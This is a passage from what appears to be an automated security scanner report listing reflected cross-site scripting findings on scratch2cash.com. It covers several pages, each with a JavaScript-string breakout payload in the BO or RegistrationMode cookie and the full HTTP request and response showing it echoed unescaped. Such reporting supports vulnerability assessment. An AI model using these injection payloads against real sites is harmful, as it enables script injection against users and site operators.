The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 59db6"-alert(1)-"65fa3a5ec60 was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /AboutUs.aspx HTTP/1.1
Host: www.scratch2cash.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; LanguageCode=ENG; RegistrationMode=PM59db6"-alert(1)-"65fa3a5ec60; BO=FM; CountryCode=US; CSI_1=EncryptedUniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CSITemp=1; ASP.NET_SessionId=s0o21j45kqjx1w45ngfpul55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:45:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM59db6"-alert(1)-"65fa3a5ec60; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:28 GMT; path=/
Set-Cookie: BO=FM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:28 GMT; path=/
Set-Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:28 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:28 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:28 GMT; path=/
Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 49076

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM59db6"-alert(1)-"65fa3a5ec60";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.378. http://www.scratch2cash.com/ContactUsMail.aspx [BO cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scratch2cash.com
Path:	/ContactUsMail.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a2c4e"-alert(1)-"8a0e8f0750 was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /ContactUsMail.aspx HTTP/1.1
Host: www.scratch2cash.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; LanguageCode=ENG; RegistrationMode=PM; BO=FMa2c4e"-alert(1)-"8a0e8f0750; CountryCode=US; CSI_1=EncryptedUniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CSITemp=1; ASP.NET_SessionId=s0o21j45kqjx1w45ngfpul55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:45:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:43 GMT; path=/
Set-Cookie: BO=FMa2c4e"-alert(1)-"8a0e8f0750; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:43 GMT; path=/
Set-Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:43 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:43 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:43 GMT; path=/
Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 53664

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FMa2c4e"-alert(1)-"8a0e8f0750";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.379. http://www.scratch2cash.com/ContactUsMail.aspx [RegistrationMode cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scratch2cash.com
Path:	/ContactUsMail.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ac554"-alert(1)-"99961b07b3d was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /ContactUsMail.aspx HTTP/1.1
Host: www.scratch2cash.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; LanguageCode=ENG; RegistrationMode=PMac554"-alert(1)-"99961b07b3d; BO=FM; CountryCode=US; CSI_1=EncryptedUniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CSITemp=1; ASP.NET_SessionId=s0o21j45kqjx1w45ngfpul55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:45:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PMac554"-alert(1)-"99961b07b3d; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:37 GMT; path=/
Set-Cookie: BO=FM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:37 GMT; path=/
Set-Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:37 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:37 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:37 GMT; path=/
Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 53665

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PMac554"-alert(1)-"99961b07b3d";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.380. http://www.scratch2cash.com/FairPlay.aspx [BO cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scratch2cash.com
Path:	/FairPlay.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3e2ea"-alert(1)-"e01126ddd6b was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /FairPlay.aspx HTTP/1.1
Host: www.scratch2cash.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; LanguageCode=ENG; RegistrationMode=PM; BO=FM3e2ea"-alert(1)-"e01126ddd6b; CountryCode=US; CSI_1=EncryptedUniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CSITemp=1; ASP.NET_SessionId=s0o21j45kqjx1w45ngfpul55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:45:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:42 GMT; path=/
Set-Cookie: BO=FM3e2ea"-alert(1)-"e01126ddd6b; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:42 GMT; path=/
Set-Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:42 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:42 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:42 GMT; path=/
Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 47720

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FM3e2ea"-alert(1)-"e01126ddd6b";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.381. http://www.scratch2cash.com/FairPlay.aspx [RegistrationMode cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scratch2cash.com
Path:	/FairPlay.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 254b0"-alert(1)-"5fd0cfafeea was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /FairPlay.aspx HTTP/1.1
Host: www.scratch2cash.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; LanguageCode=ENG; RegistrationMode=PM254b0"-alert(1)-"5fd0cfafeea; BO=FM; CountryCode=US; CSI_1=EncryptedUniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CSITemp=1; ASP.NET_SessionId=s0o21j45kqjx1w45ngfpul55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:45:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM254b0"-alert(1)-"5fd0cfafeea; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:37 GMT; path=/
Set-Cookie: BO=FM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:37 GMT; path=/
Set-Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:37 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:37 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:37 GMT; path=/
Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 47720

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM254b0"-alert(1)-"5fd0cfafeea";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.382. http://www.scratch2cash.com/Help.aspx [BO cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scratch2cash.com
Path:	/Help.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a6481"-alert(1)-"0e3b177a35b was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /Help.aspx HTTP/1.1
Host: www.scratch2cash.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; LanguageCode=ENG; RegistrationMode=PM; BO=FMa6481"-alert(1)-"0e3b177a35b; CountryCode=US; CSI_1=EncryptedUniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CSITemp=1; ASP.NET_SessionId=s0o21j45kqjx1w45ngfpul55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:45:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:34 GMT; path=/
Set-Cookie: BO=FMa6481"-alert(1)-"0e3b177a35b; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:34 GMT; path=/
Set-Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:34 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:34 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:34 GMT; path=/
Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 47212

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FMa6481"-alert(1)-"0e3b177a35b";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.383. http://www.scratch2cash.com/Help.aspx [RegistrationMode cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scratch2cash.com
Path:	/Help.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2050b"-alert(1)-"13c02710b6 was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /Help.aspx HTTP/1.1
Host: www.scratch2cash.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; LanguageCode=ENG; RegistrationMode=PM2050b"-alert(1)-"13c02710b6; BO=FM; CountryCode=US; CSI_1=EncryptedUniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CSITemp=1; ASP.NET_SessionId=s0o21j45kqjx1w45ngfpul55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:45:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM2050b"-alert(1)-"13c02710b6; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:29 GMT; path=/
Set-Cookie: BO=FM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:29 GMT; path=/
Set-Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:29 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:29 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:29 GMT; path=/
Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 47211

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM2050b"-alert(1)-"13c02710b6";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.384. http://www.scratch2cash.com/Home.aspx [BO cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scratch2cash.com
Path:	/Home.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fd6ac"-alert(1)-"44e94d65cc0 was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /Home.aspx HTTP/1.1
Host: www.scratch2cash.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; LanguageCode=ENG; RegistrationMode=PM; BO=FMfd6ac"-alert(1)-"44e94d65cc0; CountryCode=US; CSI_1=EncryptedUniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CSITemp=1; ASP.NET_SessionId=s0o21j45kqjx1w45ngfpul55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:45:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:42 GMT; path=/
Set-Cookie: BO=FMfd6ac"-alert(1)-"44e94d65cc0; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:42 GMT; path=/
Set-Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:42 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:42 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:42 GMT; path=/
Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 44002

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FMfd6ac"-alert(1)-"44e94d65cc0";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.385. http://www.scratch2cash.com/Home.aspx [RegistrationMode cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scratch2cash.com
Path:	/Home.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 11158"-alert(1)-"41dbe1ffb72 was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /Home.aspx HTTP/1.1
Host: www.scratch2cash.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; LanguageCode=ENG; RegistrationMode=PM11158"-alert(1)-"41dbe1ffb72; BO=FM; CountryCode=US; CSI_1=EncryptedUniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CSITemp=1; ASP.NET_SessionId=s0o21j45kqjx1w45ngfpul55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:45:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM11158"-alert(1)-"41dbe1ffb72; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:37 GMT; path=/
Set-Cookie: BO=FM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:37 GMT; path=/
Set-Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:37 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:37 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:37 GMT; path=/
Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 44002

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM11158"-alert(1)-"41dbe1ffb72";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.386. http://www.scratch2cash.com/InviteFriend.aspx [BO cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scratch2cash.com
Path:	/InviteFriend.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 587a3"-alert(1)-"656db84de5e was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /InviteFriend.aspx HTTP/1.1
Host: www.scratch2cash.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; LanguageCode=ENG; RegistrationMode=PM; BO=FM587a3"-alert(1)-"656db84de5e; CountryCode=US; CSI_1=EncryptedUniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CSITemp=1; ASP.NET_SessionId=s0o21j45kqjx1w45ngfpul55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:45:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:35 GMT; path=/
Set-Cookie: BO=FM587a3"-alert(1)-"656db84de5e; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:35 GMT; path=/
Set-Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:35 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:35 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:35 GMT; path=/
Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 58504

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FM587a3"-alert(1)-"656db84de5e";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.387. http://www.scratch2cash.com/InviteFriend.aspx [RegistrationMode cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scratch2cash.com
